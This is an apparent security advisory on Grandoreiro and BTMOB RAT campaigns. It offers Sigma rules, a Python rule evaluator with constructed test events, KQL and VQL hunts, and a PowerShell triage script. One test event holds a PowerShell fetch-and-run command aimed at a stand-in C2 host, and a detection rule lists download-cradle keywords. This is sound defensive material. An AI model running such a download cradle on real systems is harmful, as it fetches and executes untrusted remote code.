Security teams must heighten defenses against active campaigns deploying the Grandoreiro banking trojan and BTMOB RAT. Recent intelligence from WatchGuard and ESET confirms threat actors are aggressively targeting entities in Spain, Portugal, and Mexico with Windows-based infections, while simultaneously mobile users in Brazil are under siege via Android malware.
This is not a theoretical exercise. These are financially motivated operations designed to hijack banking sessions and steal sensitive credentials. The dual-platform approach indicates a mature threat ecosystem aiming to maximize the attack surface. Defenders need to move beyond basic antivirus signatures and implement behavioral detection strategies to identify the execution chains and persistence mechanisms associated with these families.
Technical Analysis
Threat Overview:
- Grandoreiro (Windows): A sophisticated banking trojan (aka "Depriz") known for its modular architecture. It typically arrives via phishing emails containing malicious attachments (often ISO or ZIP files). Once executed, it establishes persistence, hooks into browser processes to manipulate web sessions, and communicates with Command & Control (C2) servers to receive instructions.
- BTMOB RAT (Android): A Remote Access Trojan targeting mobile devices. It exhibits capabilities common to mobile banking malware, including overlay attacks (drawing fake login screens over legitimate apps), SMS interception for 2FA bypass, and unauthorized keylogging.
Attack Chain:
- Initial Access: Phishing emails with malicious attachments (Grandoreiro) or compromised/sideloaded apps (BTMOB).
- Execution:
  - Windows: User opens attachment -> Script/MSI installer executes -> Payload decrypted in memory.
  - Android: App installs -> Requests abusive permissions (Accessibility, SMS).
- Persistence:
  - Windows: Registry Run keys, Scheduled Tasks, or Service creation.
  - Android: Background services, leveraging Accessibility Services to survive restarts.
- C2 Communication: Encrypted traffic to known malicious infrastructure to exfiltrate data and receive updates.
Exploitation Status:
- Status: Confirmed active exploitation (ITW).
- Geography: Spain, Portugal, Mexico (Windows); Brazil (Android).
Detection & Response
The following detection rules and queries are designed to identify the behavioral fingerprints of these campaigns. While Grandoreiro evolves, its reliance on MSI installers and process injection is a consistent TTP that can be hunted.
Sigma Rules
---
title: Potential Grandoreiro Banking Trojan Execution via MSI
id: 8a4b2c91-2d3e-4f5a-9b1c-3d6e7f8a9b0c
status: experimental
description: Detects potential execution of Grandoreiro banking trojan via MSI installers spawned from user directories, a common delivery vector.
references:
  - https://www.watchguard.com/wgrd-resource-center/security-center/threat-views/grandoreiro
author: Security Arsenal
date: 2026/05/06
tags:
  - attack.execution
  - attack.t1204
  - attack.initial_access
  - attack.t1566
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\msiexec.exe'
    CommandLine|contains:
      - '/i'
      - '/package'
  filter_generic:
    ParentImage|contains:
      - '\System32\'
      - '\SysWOW64\'
  selection_suspicious_path:
    CommandLine|contains:
      - '\AppData\Local\Temp'
      - '\AppData\Roaming'
      - '\Downloads'
  condition: selection and not filter_generic and selection_suspicious_path
falsepositives:
  - Legitimate software installations by users (rare in enterprise environments without approval)
level: high
---
title: Suspicious PowerShell Web Request (Grandoreiro Downloader)
id: 9b5c3d02-3e4f-5a6b-0c2d-4e7f8a9b1c2d
status: experimental
description: Detects PowerShell commands used to download payloads, a technique frequently used in the initial stages of banking trojan infections like Grandoreiro.
references:
  - https://attack.mitre.org/techniques/T1059/001/
author: Security Arsenal
date: 2026/05/06
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  condition: selection
falsepositives:
  - System administration scripts
  - Legitimate software update mechanisms
level: medium
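To check how the two rules above behave on concrete events before deploying them, here is an added Python evaluator (not from the original page or from Security Arsenal) that applies the same selection blocks and conditions, using Sigma's default case-insensitive matching, to a handful of constructed process-creation events:

```python
def _match(event: dict, field_mod: str, patterns) -> bool:
    # One Sigma field/modifier pair: plain equality, |endswith or |contains; list values are ORed.
    # Sigma matching is case-insensitive by default, so both sides are lowercased.
    field, _, modifier = field_mod.partition("|")
    actual = str(event.get(field, "")).lower()
    for pattern in (patterns if isinstance(patterns, list) else [patterns]):
        pattern = pattern.lower()
        if (modifier == "endswith" and actual.endswith(pattern)) or \
           (modifier == "contains" and pattern in actual) or \
           (modifier == "" and actual == pattern):
            return True
    return False

def block_matches(event: dict, block: dict) -> bool:
    # All field/value pairs inside one selection block are ANDed
    return all(_match(event, key, value) for key, value in block.items())

# Selection blocks copied from the rules above (in Python source "\\" is one backslash)
MSI_SELECTION = {"Image|endswith": "\\msiexec.exe", "CommandLine|contains": ["/i", "/package"]}
MSI_FILTER_GENERIC = {"ParentImage|contains": ["\\System32\\", "\\SysWOW64\\"]}
MSI_SUSPICIOUS_PATH = {"CommandLine|contains": ["\\AppData\\Local\\Temp", "\\AppData\\Roaming", "\\Downloads"]}
PS_SELECTION = {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
                "CommandLine|contains": ["Invoke-WebRequest", "IEX", "DownloadString"]}

def grandoreiro_msi_hit(event: dict) -> bool:
    # condition: selection and not filter_generic and selection_suspicious_path
    return (block_matches(event, MSI_SELECTION)
            and not block_matches(event, MSI_FILTER_GENERIC)
            and block_matches(event, MSI_SUSPICIOUS_PATH))

def ps_downloader_hit(event: dict) -> bool:
    # condition: selection
    return block_matches(event, PS_SELECTION)

# Constructed sample events (not real telemetry); the trailing comment gives the expected verdict
EVENTS = [
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'msiexec.exe /i "C:\\Users\\ana\\Downloads\\Factura_2026.msi"'},        # MSI rule hit
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "C:\\Windows\\System32\\msiexec.exe /V"},                                # service instance, filtered
    {"Image": "C:\\Windows\\SysWOW64\\msiexec.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'msiexec.exe /i "C:\\Program Files\\Vendor\\setup.msi"'},                # not a user-profile path
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"},  # downloader hit
]

def evaluate(events=EVENTS) -> list:
    # (msi_rule, powershell_rule) verdict per event, in input order
    return [(grandoreiro_msi_hit(e), ps_downloader_hit(e)) for e in events]
```

Note that the second event is dropped by `selection` alone (`/V` is not `/i` or `/package`), so the `filter_generic` exclusion only matters for service-spawned instances that do carry an install switch.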
KQL (Microsoft Sentinel)
This query hunts for the Grandoreiro MSI execution chain on Windows endpoints and correlates each hit with outbound web connections from the same host in the following hour, so potential C2 traffic can be reviewed next to the execution evidence. BTMOB C2 traffic will only surface in endpoint telemetry if mobile devices are proxied through instrumented corporate infrastructure.
// Hunt for Grandoreiro MSI execution patterns
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "msiexec.exe"
| where ProcessCommandLine has_any ("/i", "/package")
// Verbatim strings (@"...") avoid escaping every backslash in the path fragments
| where ProcessCommandLine has_any (@"AppData\Local\Temp", @"AppData\Roaming", @"Downloads")
// Exclude instances started by the Windows Installer service itself;
// explorer.exe is deliberately kept because it is the usual parent when a user double-clicks an MSI
| where InitiatingProcessFileName !in~ ("services.exe", "svchost.exe")
| extend InitiatedBy = AccountName
| project Timestamp, DeviceName, InitiatedBy, FolderPath, ProcessCommandLine, InitiatingProcessFileName
// Correlate with outbound web connections from the same host within the following hour
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > ago(7d)
    | where RemotePort in (443, 80)
    | project DeviceName, NetTimestamp = Timestamp, RemoteUrl, RemoteIP, RemotePort
) on DeviceName
| where NetTimestamp between (Timestamp .. (Timestamp + 1h))
| summarize Connections = count(), FirstSeen = min(NetTimestamp)
    by DeviceName, InitiatedBy, ProcessCommandLine, RemoteUrl, RemoteIP, InitiatingProcessFileName
| order by Connections desc
Velociraptor VQL
Hunt for persistence mechanisms and file artifacts associated with Grandoreiro.
-- Hunt for Grandoreiro persistence mechanisms and suspicious MSI files.
-- VQL has no UNION; run these as two queries in a notebook cell or as two artifact sources.

-- 1. Recently written MSI files in user profile directories (common dropper locations)
SELECT OSPath, Mtime, Atime, Size, Mode
FROM glob(globs=["C:/Users/*/AppData/Roaming/*.msi",
                 "C:/Users/*/AppData/Local/Temp/*.msi",
                 "C:/Users/*/Downloads/*.msi"])
WHERE Mtime > timestamp(epoch=now() - 7 * 24 * 3600)

-- 2. Run key values that launch an executable from outside Program Files / ProgramData.
--    The registry accessor exposes each value as a row: Name is the value name, Data.value its content.
SELECT OSPath AS RegistryPath,
       Mtime AS ModifiedTime,
       Name AS ValueName,
       Data.value AS ValueData
FROM glob(globs="HKEY_USERS/*/Software/Microsoft/Windows/CurrentVersion/Run/*",
          accessor="registry")
WHERE ValueData =~ "(?i)\\.exe"
  AND NOT ValueData =~ "(?i)Program Files|ProgramData"
  AND ModifiedTime > timestamp(epoch=now() - 30 * 24 * 3600)
Remediation Script (PowerShell)
Use this script to identify and contain potential Grandoreiro artifacts on a Windows host. Requires administrative privileges.
# Security Arsenal - Grandoreiro Incident Response Script
# Run as Administrator
function Invoke-GrandoreiroRemediation {
    Write-Host "[+] Starting Grandoreiro Artifact Scan and Remediation..." -ForegroundColor Cyan

    # 1. Check for suspicious MSI files in user profiles (common dropper locations)
    Write-Host "[*] Scanning for suspicious MSI files in user profiles..." -ForegroundColor Yellow
    $msiPaths = @("C:\Users\*\AppData\Local\Temp\*.msi", "C:\Users\*\Downloads\*.msi")
    $suspiciousMSI = Get-ChildItem -Path $msiPaths -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
    if ($suspiciousMSI) {
        foreach ($file in $suspiciousMSI) {
            Write-Host "[!] Suspicious MSI found: $($file.FullName)" -ForegroundColor Red
            # Quarantine or removal placeholder; keep -WhatIf until the file has been reviewed
            # Remove-Item -Path $file.FullName -Force -WhatIf
        }
    } else {
        Write-Host "[-] No recent suspicious MSI files found." -ForegroundColor Green
    }

    # 2. Check Registry Run keys for suspicious persistence
    Write-Host "[*] Auditing Registry Run Keys for suspicious persistence..." -ForegroundColor Yellow
    $runKeys = @(
        "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
        "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
        "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
    )
    foreach ($key in $runKeys) {
        if (Test-Path $key) {
            $regKey = Get-Item -Path $key
            foreach ($name in $regKey.GetValueNames()) {
                $propValue = [string]$regKey.GetValue($name)
                # Flag executables that live outside Program Files or the Windows directory.
                # Not anchored to end-of-string: Run values often carry arguments after the path.
                if ($propValue -match '\.exe' -and $propValue -notmatch 'Program Files' -and $propValue -notmatch '\\Windows\\') {
                    Write-Host "[!] Suspicious Run Key Entry: $key\$name = $propValue" -ForegroundColor Red
                }
            }
        }
    }

    # 3. Network hardening (block known C2 ranges - placeholder for intel)
    # Note: Add specific Grandoreiro IPs/URLs here based on current intel feeds
    Write-Host "[*] Ensure firewall blocks outbound connections to non-corporate IPs on non-standard ports." -ForegroundColor Yellow
    Write-Host "[+] Remediation scan complete. Manual review required for flagged artifacts." -ForegroundColor Green
}
Invoke-GrandoreiroRemediation
Remediation
Immediate Actions:
- Isolate Infected Hosts: Disconnect confirmed or suspected Windows and Android devices from the network immediately to prevent lateral movement and data exfiltration.
- Block Indicators of Compromise (IOCs): Update firewalls, secure web gateways (SWG), and endpoint detection systems with the latest IOCs provided by WatchGuard and ESET for Grandoreiro and BTMOB.
- Password Resets: Force a reset of banking credentials and sensitive corporate passwords for users on affected devices, assuming potential credential theft.
Eradication and Recovery:
- Windows: Reimage compromised machines. Grandoreiro is a complex trojan with multiple components; simple file deletion is often insufficient.
- Android: Perform a factory reset on compromised mobile devices. Do not attempt to clean the device via mobile AV; a factory reset is the only guaranteed way to remove RAT persistence.
Long-Term Hardening:
- Application Whitelisting: Implement strict application control (e.g., AppLocker) to prevent msiexec.exe from running from user profile directories.
- Mobile Device Management (MDM): Enforce "Google Play Protect" and disable "Install Unknown Apps" for all corporate-enrolled Android devices to prevent BTMOB RAT installation.
- Phishing Resistance: Enhance email filtering to block ISO, ZIP, and MSI attachments from external sources.